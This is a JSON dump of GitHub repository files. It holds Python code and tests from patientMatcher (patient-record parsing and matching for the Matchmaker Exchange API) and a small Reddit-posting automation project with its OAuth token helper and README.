phenotype terms and annotations are used by phenotype scoring algorithm and\n# are updated using the CLI\nPHENOTYPE_TERMS= {\n 'hpo_ontology' : {\n 'url': 'http://purl.obolibrary.org/obo/hp.obo',\n 'resource_path' : path_to_hpo_terms\n },\n 'hpo_annotations' : {\n 'url': 'http://compbio.charite.de/jenkins/job/hpo.annotations/lastStableBuild/artifact/misc/phenotype_annotation.tab',\n 'resource_path' : path_to_phenotype_annotations\n }\n}\n" }, { "alpha_fraction": 0.6190328001976013, "alphanum_fraction": 0.6247861981391907, "avg_line_length": 32.67015838623047, "blob_id": "12354d74e3a2c147453f4250cc77a920d8603699", "content_id": "8113342268bce158d17a58087e2f1fe03b9e0ce2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6431, "license_type": "permissive", "max_line_length": 102, "num_lines": 191, "path": "/patientMatcher/parse/patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport json\nfrom jsonschema import validate, RefResolver, FormatChecker\nfrom patientMatcher.utils.gene import symbol_to_ensembl, entrez_to_symbol, ensembl_to_symbol\nfrom pkgutil import get_data\nimport logging\n\nLOG = logging.getLogger(__name__)\nSCHEMA_FILE = 'api.json'\n\ndef mme_patient(json_patient, convert_to_ensembl=False):\n \"\"\"\n Accepts a json patient and converts it to a MME patient,\n formatted as required by patientMatcher database\n\n Args:\n patient_obj(dict): a patient object as in https://github.com/ga4gh/mme-apis\n convert_to_entrez(bool): convert gene IDs to ensembl IDs\n\n Returns:\n mme_patient(dict) : a mme patient entity\n \"\"\"\n\n # Make sure gene objects are defined by ensembl IDs\n if json_patient.get('genomicFeatures') and convert_to_ensembl:\n format_genes(json_patient)\n\n mme_patient = {\n '_id' : json_patient['id'],\n 'id' : json_patient['id'],\n 'label' : json_patient.get('label'),\n 'sex' : json_patient.get('sex'),\n 'contact' : json_patient['contact'],\n 'features' : json_patient.get('features'),\n 'genomicFeatures' : json_patient.get('genomicFeatures'),\n 'disorders' : json_patient.get('disorders'),\n 'species' : json_patient.get('species'),\n 'ageOfOnset' : json_patient.get('ageOfOnset'),\n 'inheritanceMode' : json_patient.get('inheritanceMode')\n }\n\n # remove keys with empty values from mme_patient object\n mme_patient = {k:v for k,v in mme_patient.items() if v is not None}\n\n return mme_patient\n\n\ndef json_patient(mme_patient):\n \"\"\" Converts a mme patient into a json-like as in the MME APIs\n\n Args:\n mme_patient(dict): a patient object as it is stored in database\n\n Returns:\n json_patient(dict): a patient object conforming to MME API\n \"\"\"\n json_patient = mme_patient\n if 'id' not in mme_patient:\n json_patient['id'] = json_patient['_id']\n if '_id' in json_patient:\n json_patient.pop('_id')\n\n return json_patient\n\n\ndef features_to_hpo(features):\n \"\"\"Extracts HPO terms from a list of phenotype features of a patient\n\n Args:\n features(list): a list of features dictionaries\n\n Returns:\n hpo_terms(list): a list of HPO terms. Example : ['HP:0100026', 'HP:0009882', 'HP:0001285']\n \"\"\"\n if features is None:\n return []\n hpo_terms = [feature.get('_id') for feature in features if feature.get('_id')]\n if len(hpo_terms) == 0:\n hpo_terms = [feature.get('id') for feature in features if feature.get('id')]\n return hpo_terms\n\n\ndef disorders_to_omim(disorders):\n \"\"\"Extracts OMIM terms from a list of disorders of a patient\n\n Args:\n disorders(list): a list of disorders\n\n Returns:\n omim_terms(list): a list of OMIM terms. Example : ['MIM:616007', 'MIM:614665']\n \"\"\"\n if disorders is None:\n return []\n omim_terms = [disorder.get('id') for disorder in disorders if disorder.get('id')]\n return omim_terms\n\n\ndef format_genes(patient_obj):\n \"\"\"Checks if patient's gFeatures gene ids are defined as ensembl ids.\n If they are entrez ids or symbols thet will be converted to ensembl IDs.\n\n Args:\n patient_obj(dict): A patient object with genotype features\n \"\"\"\n formatted_features = []\n for feature in patient_obj.get('genomicFeatures', []):\n symbol = None\n if 'gene' in feature and feature['gene'].get('id'):\n gene = feature['gene']['id']\n if gene.isdigit() or gene.startswith('ENSG') is False:\n if gene.isdigit(): #Likely an entrez gene ID\n LOG.info('Converting entrez gene {} to symbol'.format(gene))\n symbol = entrez_to_symbol(gene)\n else: # It's a gene symbol\n symbol = gene\n if symbol:\n LOG.info('Converting gene symbol {} to Ensembl'.format(symbol))\n ensembl_id = symbol_to_ensembl(symbol)\n if ensembl_id:\n feature['gene']['id'] = ensembl_id\n else: # gene id is Ensembl id\n symbol = ensembl_to_symbol(gene)\n\n if symbol:\n feature['gene']['_geneName'] = symbol # add non-standard but informative field\n\n formatted_features.append(feature)\n\n if formatted_features:\n patient_obj['genomicFeatures'] = formatted_features\n\n\ndef gtfeatures_to_genes(gtfeatures):\n \"\"\"Extracts all gene names from a list of genomic features\n Args:\n gtfeatures(list): a list of genomic features objects\n\n Returns:\n gene_set(list): a list of unique gene names contained in the features\n \"\"\"\n genes = []\n for feature in gtfeatures:\n if 'gene' in feature and feature['gene'].get('id'): # collect non-null gene IDs\n genes.append(feature['gene']['id'])\n gene_set = list(set(genes))\n return gene_set\n\n\ndef gtfeatures_to_variants(gtfeatures):\n \"\"\"Extracts all variants from a list of genomic features\n\n Args:\n gtfeatures(list): a list of genomic features objects\n\n Returns:\n variants(list): a list of variants\n \"\"\"\n variants = []\n for feature in gtfeatures:\n if 'variant' in feature:\n variants.append(feature['variant'])\n\n return variants\n\n\ndef validate_api(json_obj, is_request):\n \"\"\"Validates a request against the MME API\n The code for the validation against the API and the API specification is taken from\n this project: https://github.com/MatchmakerExchange/reference-server\n\n Args:\n json_obj(dict): json request or response to validate\n is_request(bool): True if it is a request, False if it is a response\n\n Returns\n validated(bool): True or False\n \"\"\"\n validated = True\n schema = '#/definitions/response'\n if is_request:\n schema = '#/definitions/request'\n\n LOG.info(\"Validating against SCHEMA {}\".format(schema))\n\n # get API definitions\n schema_data = json.loads(get_data('patientMatcher.resources', SCHEMA_FILE).decode('utf-8'))\n resolver = RefResolver.from_schema(schema_data)\n format_checker = FormatChecker()\n resolver_schema = resolver.resolve_from_url(schema)\n validate(json_obj, resolver_schema, resolver=resolver, format_checker=format_checker)\n" }, { "alpha_fraction": 0.7967479825019836, "alphanum_fraction": 0.7967479825019836, "avg_line_length": 7.785714149475098, "blob_id": "b7374754c40fdb7212c159a02471300509a69673", "content_id": "ce358e8235846340c97ccdee2c5bae71127a96be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 123, "license_type": "permissive", "max_line_length": 22, "num_lines": 14, "path": "/requirements.txt", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "## server\nFlask\nFlask-Mail\nflask-negotiate\nrequests\njsonschema\n\n\n## database connection\npymongo\n\n##backend\nenlighten\nclint\n" }, { "alpha_fraction": 0.6743008494377136, "alphanum_fraction": 0.6897299885749817, "avg_line_length": 40.069305419921875, "blob_id": "d6dd4aa21c043d35c0656410c1db4e83a621a47f", "content_id": "d74a0294f5af099ae6007841c16b8ee3faabac50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4148, "license_type": "permissive", "max_line_length": 118, "num_lines": 101, "path": "/tests/match/test_matching_handler.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport requests\nfrom patientMatcher.utils.add import backend_add_patient\nfrom patientMatcher.parse.patient import mme_patient\nfrom patientMatcher.match.handler import internal_matcher, save_async_response, external_matcher\n\ndef test_internal_matching(database, gpx4_patients):\n \"\"\"Testing the combined matching algorithm\"\"\"\n\n # load 2 test patients in mock database\n for patient in gpx4_patients:\n mme_pat = mme_patient(patient, True) # convert gene symbol to ensembl\n database['patients'].insert_one(mme_pat).inserted_id\n\n # 2 patients should be inserted\n results = database['patients'].find({'genomicFeatures.gene.id': 'ENSG00000167468'})\n assert len(list(results)) == 2\n\n # test matching of one of the 2 patients against both patients in database\n proband_patient = mme_patient(gpx4_patients[0], True)\n\n match = internal_matcher(database, proband_patient, 0.5, 0.5)\n match_patients = match['results'][0]['patients']\n assert len(match_patients) == 2\n\n higest_scored_patient = match_patients[0] # first returned patient has higher score\n lowest_scored_patient = match_patients[-1] # last returned patient has lower score\n\n assert higest_scored_patient['score']['patient'] > lowest_scored_patient['score']['patient']\n\n\ndef test_internal_matching_with_threshold(database, gpx4_patients):\n # load 2 test patients in mock database\n for patient in gpx4_patients:\n mme_pat = mme_patient(patient, True) # convert gene symbol to ensembl\n database['patients'].insert_one(mme_pat).inserted_id\n\n # 2 patients should be inserted\n results = database['patients'].find({'genomicFeatures.gene.id': 'ENSG00000167468'})\n assert len(list(results)) == 2\n\n # test matching of one of the 2 patients against both patients in database\n proband_patient = mme_patient(gpx4_patients[0], True)\n\n match = internal_matcher( database=database, patient_obj=proband_patient, max_pheno_score=0.5, max_geno_score=0.5,\n max_results=5, score_threshold=0.5)\n match_patients = match['results'][0]['patients']\n assert len(match_patients) == 1 # one patient is filtered out by search threshold\n\n\ndef test_external_matching(database, test_node, gpx4_patients, monkeypatch):\n \"\"\"Testing the function that trigger patient matching across connected nodes\"\"\"\n\n patient = gpx4_patients[0]\n\n # insert test node object in database\n database['nodes'].insert_one(test_node)\n\n # insert patient object in database\n inserted_ids = backend_add_patient(mongo_db=database, patient=patient, match_external=False)\n assert inserted_ids\n\n class MockResponse(object):\n def __init__(self):\n self.status_code = 200\n def json(self):\n resp = {\n \"disclaimer\" : \"This is a test disclaimer\",\n \"results\" : gpx4_patients\n }\n return resp\n\n def mock_response(*args, **kwargs):\n return MockResponse()\n\n monkeypatch.setattr( requests , 'request', mock_response )\n\n ext_m_result = external_matcher(database, patient, test_node['_id'])\n assert isinstance(ext_m_result, dict)\n assert ext_m_result['data']['patient']['id'] == patient['id']\n assert ext_m_result['has_matches'] == True\n assert ext_m_result['match_type'] == 'external'\n\n\ndef test_save_async_response(database, test_node):\n \"\"\"Testing the function that saves an async response object to database\"\"\"\n\n # Test database should not contain async responses\n results = database['async_responses'].find()\n assert len(list(results)) == 0\n\n # Save an async response using the matching handler\n save_async_response(database=database, node_obj=test_node,\n query_id='test', query_patient_id='test_patient')\n\n # async_responses database collection should now contain one object\n async_response = database['async_responses'].find_one()\n assert async_response['query_id'] == 'test'\n assert async_response['query_patient_id'] == 'test_patient'\n assert async_response['node']['id'] == test_node['_id']\n assert async_response['node']['label'] == test_node['label']\n" } ]
28
Alexander1022/Reddit-Automation
https://github.com/Alexander1022/Reddit-Automation
b08afa6b2cdbedcde77eafc7b599b18d27f52f38
c1348e78941a33de20d6eb89f54a25b7aad2218b
e0f2e1d5f68ed063809ff84a71de8ab98c1377a1
refs/heads/main
2023-04-15T06:38:33.309632
2021-04-29T15:33:13
2021-04-29T15:33:13
362,858,818
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6388415694236755, "alphanum_fraction": 0.640545129776001, "avg_line_length": 29.921052932739258, "blob_id": "787429210ee18097243eb8f6794bc8bb992ef8fa", "content_id": "4ecb49781ecd9ea5c595246aae76a8291bfe2364", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1174, "license_type": "permissive", "max_line_length": 111, "num_lines": 38, "path": "/main.py", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "import praw, requests, json, time\n\nsubreddit_choice = 'Python'\nconfig_file = 'config.json'\n\nwith open(config_file) as f:\n credentials = json.load(f)\n\nreddit = praw.Reddit(client_id = credentials['client_id'],\n client_secret=credentials['client_secret'],\n user_agent=credentials['user_agent'],\n redirect_uri=credentials['redirect_uri'],\n refresh_token=credentials['refresh_token'])\n\nif not credentials['refresh_token']:\n print(\"Please fill the config file.\")\n exit()\n\nsubreddit = reddit.subreddit(subreddit_choice)\nprint(\"You are posting to \\\"\" + str(subreddit_choice) + \"\\\"\")\n\ntitle=input(\"What title do you want: \")\ncontent = input(\"What text do you want (you can leave it empty in some subs): \")\nnsfw_check = input(\"Is the post NSFW: \")\n\nif(nsfw_check == 'yes'):\n nsfw = True\nelse:\n nsfw = False\n\nsubreddit.submit(title, selftext = content, nsfw = nsfw)\nreddit.validate_on_submit = True\n\nprint(\"[POSTING]\\n\" + \"Title: \" + str(title) + \"\\n\" + \"Content: \" + str(content) + \"\\n\" + \"NSFW: \" + str(nsfw))\n\n# reddit posts the content after about 3 seconds\ntime.sleep(3)\nprint(\"[POSTED]\")" }, { "alpha_fraction": 0.6031344532966614, "alphanum_fraction": 0.6228513717651367, "avg_line_length": 30.919355392456055, "blob_id": "3484b9619b2840d818305608625118af69e60466", "content_id": "8080d705121abdfd221dbd1f9993fb95fbb7aa72", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1978, "license_type": "permissive", "max_line_length": 94, "num_lines": 62, "path": "/generate-key.py", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "import random, socket, sys, praw\n \ndef receive_connection():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind((\"localhost\", 3221))\n server.listen(1)\n client = server.accept()[0]\n server.close()\n return client\n \ndef send_message(client, message):\n print(message)\n client.send(f\"HTTP/1.1 200 OK\\r\\n\\r\\n{message}\".encode(\"utf-8\"))\n client.close()\n\ndef main():\n print(\"Create your token here: \", \"https://www.reddit.com/prefs/apps/\")\n\n print(\"Go to http://localhost:3221 and follow the steps.\")\n\n client_id = input(\"Enter the client ID: \")\n client_secret = input(\"Enter the client secret key: \")\n\n commaScopes = input(\"Now enter a comma separated list of scopes, or all for all tokens: \")\n \n if commaScopes.lower() == \"all\":\n scopes = [\"*\"]\n else:\n scopes = commaScopes.strip().split(\",\")\n \n reddit = praw.Reddit(\n client_id=client_id.strip(),\n client_secret=client_secret.strip(),\n redirect_uri=\"http://localhost:3221\",\n user_agent=\"python-automation\",\n )\n state = str(random.randint(0, 65000))\n url = reddit.auth.url(scopes, state, \"permanent\")\n print(f\"Now open this url in your browser: {url}\")\n sys.stdout.flush()\n \n client = receive_connection()\n data = client.recv(1024).decode(\"utf-8\")\n param_tokens = data.split(\" \", 2)[1].split(\"?\", 1)[1].split(\"&\")\n params = { key: value for (key, value) in [token.split(\"=\") for token in param_tokens] }\n \n if state != params[\"state\"]:\n send_message(client, f\"State mismatch. Expected: {state} Received: {params['state']}\")\n return 1\n\n elif \"error\" in params:\n send_message(client, params[\"error\"])\n return 1\n \n refresh_token = reddit.auth.authorize(params[\"code\"])\n send_message(client, f\"Refresh token: {refresh_token}\")\n return 0\n \n \nif __name__ == \"__main__\":\n sys.exit(main())" }, { "alpha_fraction": 0.7018561363220215, "alphanum_fraction": 0.7111368775367737, "avg_line_length": 34.91666793823242, "blob_id": "38337ebbf6e5ba3d9eb6cfc7aaaf53896ff1c066", "content_id": "e2671876374b7c335d5f11b36e91675b987413f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 862, "license_type": "permissive", "max_line_length": 137, "num_lines": 24, "path": "/README.md", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "# Reddit Automation with Python\n\n\nThis project is called **Reddit Automation**. You can post in Reddit from the terminal. It's faster and easier. \n\n![Reddit Logo](./reddit-logo.png)\n\n# Files\n\nIn the project you have 3 files:\n \n\n 1. **main** - run in the end when you are done with the files bellow\n 2. **generate-key** - with this file you can generate **refresh token**\n 3. **config** - in this file you have to write you client id, secret key and refresh token that you generated with **generate-key** file\n\n## How to use\n1. Go to [Reddit Apps Page](https://www.reddit.com/prefs/apps) and create a new app. \n2. Look for CLIENT ID and SECRET KEY.\n3. Run `python generate-key.py` to generate a refresh token.\n4. Run `python main.py` and follow the steps. \n*Disclaimer: by default the subreddit is set to **Python**. You can change it from main.py.*\n\nEnjoy! :)\n" } ]
3
Jonathanliu92251/wechat-bot
https://github.com/Jonathanliu92251/wechat-bot
ae29fd8f5b9456eda496da8d35e6a06ab6b00b3c
8b7628bb7f1c2bee2573c6923e268b163f89729c
dc73fe10b9e7376a18e087c850d37ed5e00361d9
refs/heads/master
2020-03-25T20:12:19.167631
2018-08-09T08:52:06
2018-08-09T08:52:06
144,120,749
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6458684802055359, "alphanum_fraction": 0.6728498935699463, "avg_line_length": 23.70833396911621, "blob_id": "518219c6a923784dfab03d9ad50890e17ee6fd14", "content_id": "abb3720bf85b83bf9b0cfe4d6dc11e0cbb480c76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 59, "num_lines": 24, "path": "/wechat/tuling.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\n\[email protected]_register([TEXT])\ndef text_reply(msg):\n info = msg['Text'].encode('UTF-8')\n url ='http://www.tuling123.com/openapi/api'\n data={u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \"info\":info, u\"loc\":\"\", \"userid\":\"\"}\n data = urllib.urlencode(data)\n\n url2 = urllib2.Request(url,data)\n \n response = urllib2.urlopen(url2)\n\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n print 's==',s\n if s['code'] == 100000:\n itchat.send( s['text'], msg['FromUserName'])\n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6856464743614197, "alphanum_fraction": 0.7034400701522827, "avg_line_length": 29.636363983154297, "blob_id": "cec4c5e34ff5f4cdcec4122fc9ce210d02c70494", "content_id": "f06fa5e2052ecc9af3cd560992ba07fcf9e8a4cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 116, "num_lines": 55, "path": "/README.md", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "## Setup & Run\n1. install python runtime\n1. install itchat: pip install itchat\n1. apply service from Tuling ( www.tuling123.com )\n1. apply service & create conversation from IBM Bluemix ( bluemix.net )\n1. install watson SDK: $ sudo -H pip install --ignore-installed six watson-developer-cloud\n1. modify credentials\n1. python xx.py \n2. follow wechat \"Smartcamp\"\n3. Interactive conversation w/ \"Smartcamp\" as follows:\n\n![WeChat](wx.jpg)\n\n\n\n## List of wechat\nComponent | Description | Reference\n|-----------------|----------------------------------|-----------------------|\n|tuling.py | wechat robot, w/ Tuling backend API | http://www.tuling123.com|\ntuling-specUser.py | chat service, restricted for specific wechat-usergroup| https://github.com/littlecodersh/ItChat\nwatson-console.py | console-based example for waston-conversation\nwatson-wechat.py | wechat as client | https://github.com/watson-developer-cloud/python-sdk\nwatson-tuling-wechat.py | wechat client + 2*backends ( # for Tuling, #IBM for Watson )\n\n\n## Console Apps\n### list\n* example1.js\n* example2.js\n* example3.js\n* example4.js\n\n### How to run\n\n* npm install\n* modify credentials\n* nodejs exampleX.js\n\n\n## List of nodered\nwatson-debugMode.json | waston-conversation, running in debug mode\n|:-----|:------|\nwatson-sockets.js | run in web mode, socket communication\n\n## How to modify & debug\n1. create **node-red** application in **IBM Bluemix**\n2. create service Watson conversion\n3. launch **Node-red** application -- web designer\n4. import flow from above json\n5. modifiy 'conversation' node property in these flow\n\n**debug:**\n \n1. click flow (left input node)\n1. web: https://nodered-jon001.eu-gb.mybluemix.net/testing\n\n" }, { "alpha_fraction": 0.6033014059066772, "alphanum_fraction": 0.636847734451294, "avg_line_length": 26.617647171020508, "blob_id": "c33bdb98635c00f6cdb017cc57b74e4791ee4c8a", "content_id": "9834ff19ea5fc6389031f2cec58681bba3f5a427", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1910, "license_type": "no_license", "max_line_length": 87, "num_lines": 68, "path": "/wechat/watson-tuling-wechat.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python \n#-*- coding:utf-8 -*- \n\nimport itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\nfrom watson_developer_cloud import ConversationV1\n\nresponse={'context':{}} \nconversation_server ='#TURING'\n\[email protected]_register([TEXT])\ndef text_reply(msg):\n global conversation_server, request_text, response, response_text\n request_text = msg['Text'].encode('UTF-8')\n\n if request_text == '#IBM':\n conversation_server ='#IBM'\n response={'context':{}}\n itchat.send( 'Greetings from IBM Waston', msg['FromUserName'])\n \n if request_text == '#':\n conversation_server ='#TURING'\n \n # IBM Waston Conversation\n if conversation_server =='#IBM': \n conversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n workspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\n\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n \n if len( response['output']['text']) >0:\n response_text = response['output']['text'][0]\n else: \n response_text = \"No message\" \n\n itchat.send( response_text, msg['FromUserName'])\n \n # Turling Robot\n if conversation_server =='#TURING': \n url ='http://www.tuling123.com/openapi/api'\n request = urllib.urlencode({\n u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \n \"info\":request_text, \n u\"loc\":r\"北京市中关村\", \n \"userid\":\"\"})\n\n url2 = urllib2.Request(url,request) \n response = urllib2.urlopen(url2)\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n\n if s['code'] == 100000:\n response_text = s['text']\n else:\n response_text = r'问住我了?你太牛啦!'\n \n itchat.send( response_text, msg['FromUserName'])\n \n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6367484927177429, "alphanum_fraction": 0.6765453219413757, "avg_line_length": 30.91891860961914, "blob_id": "1ceae26eea04f779658693330515c8ecbda0ee94", "content_id": "d2385becb1a2ed98d0dad576d122181702c6c624", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 123, "num_lines": 37, "path": "/wechat/watson-console.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import json\nfrom watson_developer_cloud import ConversationV1\n\n#########################\n# message\n#########################\n\nconversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n# replace with your own workspace_id\nworkspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\ntry:\n\ttype(eval(reponse['context']))\nexcept:\n response = conversation.message(workspace_id=workspace_id, message_input={'text': 'Hello'})\n print \"not defined\"\nelse:\n response = conversation.message(workspace_id=workspace_id, message_input={'text': 'Hello'}, context=response['context'])\n print \"define response\"\n\nrespMsg = response['output']['text']\nprint 'response==', response\nif len(response['output']['text']) > 0:\n print response['output']['text'][0]\nelse:\n print \"no message\"\n\n\n# When you send multiple requests for the same conversation, include the\n# context object from the previous response.\n# response = conversation.message(workspace_id=workspace_id, message_input={\n# 'text': 'turn the wipers on'},\n# context=response['context'])\n# print(json.dumps(response, indent=2))\n" }, { "alpha_fraction": 0.6717216968536377, "alphanum_fraction": 0.7038358449935913, "avg_line_length": 26.341463088989258, "blob_id": "3ff673cae34e34d6c4c9d2c2f88179a51173d8a3", "content_id": "a5afa261566be36f90d1674451d1738b87254426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1121, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/wechat/watson-wechat.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\nfrom watson_developer_cloud import ConversationV1\n\nresponse={'context':{}}\[email protected]_register([TEXT])\ndef text_reply(msg):\n global response\n request_text = msg['Text'].encode('UTF-8')\n conversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n # replace with your own workspace_id\n workspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\n\n print \"request ==>\", request_text\n\n try:\n\t type(eval(response))\n except:\n print \"first call\"\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n else:\n print \"continue call\"\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n \n if len( response['output']['text']) >0:\n response_text = response['output']['text'][0]\n else: \n response_text = \"No message\"\n\n itchat.send( response_text, msg['FromUserName'])\n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6466854810714722, "alphanum_fraction": 0.6847673058509827, "avg_line_length": 21.870967864990234, "blob_id": "9136cb08d96a890b5792632f160d153674e4e5a3", "content_id": "fa0a53836cbde0b23423d996cacc25357461c727", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 68, "num_lines": 62, "path": "/wechat/tuling-specUser.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "#http://www.tuling123.com/member/center/, [email protected]/Passw0rd\n#layout: http://blog.csdn.net/thx9537/article/details/54850038\n#itchat: http://www.cnblogs.com/hzpythoner/p/7099022.html\n#sample source: https://pan.baidu.com/s/1bpAJk0B\n\n#!/usr/bin/env python\n# coding:utf8\n\nimport itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\n\[email protected]_register([TEXT,SHARING], isGroupChat=True)\ndef text_reply(msg):\n\n # 消息来自于哪个群聊\n chatroom_id = msg['FromUserName']\n # 发送者的昵称\n username = msg['ActualNickName']\n\n if msg['Type'] == TEXT:\n info = msg['Content'].encode('UTF-8')\n elif msg['Type'] == SHARING:\n info = msg['Text'].encode('UTF-8')\n\n\n # 消息并不是来自于需要同步的群\n if chatroom_id != chatroom_ids:\n print 'not monitored'\n print msg\n return\n\n\n# info = msg['Text'].encode('UTF-8')\n url ='http://www.tuling123.com/openapi/api'\n data={u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \"info\":info, u\"loc\":\"\", \"userid\":\"\"}\n data = urllib.urlencode(data)\n\n url2 = urllib2.Request(url,data)\n \n response = urllib2.urlopen(url2)\n\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n print 's==',s\n if s['code'] == 100000:\n itchat.send( s['text'], msg['FromUserName'])\n\n \nitchat.auto_login()\n\nchatrooms = itchat.get_chatrooms()\nchatrooms_ids = '' \n\nfor item in chatrooms:\n if item['NickName'] == u'家人':\n chatroom_ids = item['UserName']\n print item['NickName']\n print chatroom_ids\n \nitchat.run(debug=True)\n" } ]
6
jdpenuliar/selectionsortdjango
https://github.com/jdpenuliar/selectionsortdjango
6a360559070837a67b60e675e62940a2ceba7b2b
21cbe112e85fc4c92b016c8415662b51bfd1d7c3
823b5bae511f66a8e36a59ce087baeb54ddf6861
refs/heads/master
2021-01-22T22:13:16.951568
2017-03-20T00:34:13
2017-03-20T00:34:13
85,519,674
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5521343350410461, "alphanum_fraction": 0.5563331246376038, "avg_line_length": 31.454545974731445, "blob_id": "e57090248ae41f53c0801ae729f877365ac0b8d4", "content_id": "5de15635b3eaf9e017ce4f0ee88cad219b470b35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 123, "num_lines": 44, "path": "/apps/selectionSort/views.py", "repo_name": "jdpenuliar/selectionsortdjango", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, HttpResponse, redirect\n\n# Create your views here.\n\ndef swap(array, firstIndex, secondIndex):\n temp = array[firstIndex]\n array[firstIndex] = array[secondIndex]\n array[secondIndex] = temp\n return array \n\ndef indexMinimum(array, startIndex):\n minValue = array[startIndex]\n minIndex = startIndex\n\n for count in range (minIndex, len(array)):\n if array[count] < minValue: \n minIndex = count \n minValue = array[count]\n return minIndex\n\ndef sort(request):\n array = []\n if request.method == \"POST\":\n for count in range (0, len(request.POST['array'])):\n print (\"haha----\\n\", request.POST[\"array\"][count])\n if (request.POST[\"array\"][count] != \",\"):\n if (request.POST[\"array\"][count] == \"-\"):\n continue\n elif ((request.POST[\"array\"][count - 1] == \"-\" and count == 1) or request.POST[\"array\"][count - 2] == \"-\"):\n array.append(int(request.POST[\"array\"][count]) * -1) \n else:\n array.append(int(request.POST[\"array\"][count])) \n\n print (\"array----\\n\", array)\n for x in range (0, len(array)):\n y = indexMinimum(array, x)\n swap(array, x, y)\n\n print (\"array-----\\n\", array)\n\n return redirect('/') \n\ndef index(request):\n return render(request, 'selectionSort/index.html') \n" }, { "alpha_fraction": 0.7821782231330872, "alphanum_fraction": 0.7821782231330872, "avg_line_length": 19.200000762939453, "blob_id": "2b32076b13661b71d11c7197706eb4e436bad50e", "content_id": "23ea23c8ee7d49c18008f65dff5604cfdb2c209c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 101, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/apps/selectionSort/apps.py", "repo_name": "jdpenuliar/selectionsortdjango", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SelectionsortConfig(AppConfig):\n name = 'selectionSort'\n" } ]
2
mplociennik/raspie
https://github.com/mplociennik/raspie
4d875ee96adced57853c96f070f702963fffc1df
a3160ac4dfdd9846e56a17558af7c00f8a5dd74a
e6edf1d8671668ccfcace0dfc5d00795ac547157
refs/heads/master
2021-01-17T10:32:00.768827
2016-10-14T21:12:27
2016-10-14T21:12:27
58,819,736
0
0
null
null
null
null
null
